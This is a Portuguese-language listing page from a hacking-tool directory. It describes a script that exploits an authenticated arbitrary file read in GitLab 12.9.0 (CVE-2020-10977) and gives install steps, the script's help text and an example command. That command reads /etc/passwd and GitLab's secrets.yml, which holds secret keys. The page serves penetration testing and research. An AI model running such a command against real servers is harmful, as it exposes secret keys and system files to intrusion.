Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/erk3/gitlab-12.9.0-file-read
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHuberk3/gitlab-12.9.0-file-read

gitlab-12.9.0-file-read

Um script (que pretende ser) melhor do que o que pode ser encontrado no exploit-db sobre a leitura arbitrária de arquivos autenticada no GitLab v12.9.0 (CVE-2020-10977)

Ver Repositório
há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

O aviso

Apenas para fins de demonstração e hacking ético.

O que

Um script (que se pretende) melhor do que o que pode ser encontrado no exploit-db sobre a leitura arbitrária de arquivos autenticada no GitLab v12.9.0 (CVE-2020-10977)

Como fazer

  1. Atenda à dependência (você provavelmente já tem o resto)

pip3 install requests python-gitlab

  1. Obtenha um token de API usando suas credenciais

https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html

  1. Lucro?
root@kitploit:~
$ python3 gitlab-12.9.0-lfi.py -h
usage: gitlab-12.9.0-lfi.py [-h] -H HOST -u USER -p PASSWD -t TOKEN -f FILES

argumentos opcionais:
  -h, --help            mostra esta mensagem de ajuda e sai
  -H HOST, --host HOST  A URI https do webroot do GitLab
  -u USER, --user USER  O nome do usuário
  -p PASSWD, --passwd PASSWD
                        A senha do usuário
  -t TOKEN, --token TOKEN
                        O token de acesso
  -f FILES, --files FILES
                        Os caminhos absolutos para os arquivos no sistema local do GitLab
root@kitploit:~
$ python3 gitlab-12.9.0-file-read.py -H https://gitlab.domain.com/ -u erk3 -p test1234 -t 9nsDFXshb1txxkkZAv24 -f /etc/passwd -f /etc/hosts -f /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
Baixar ferramenta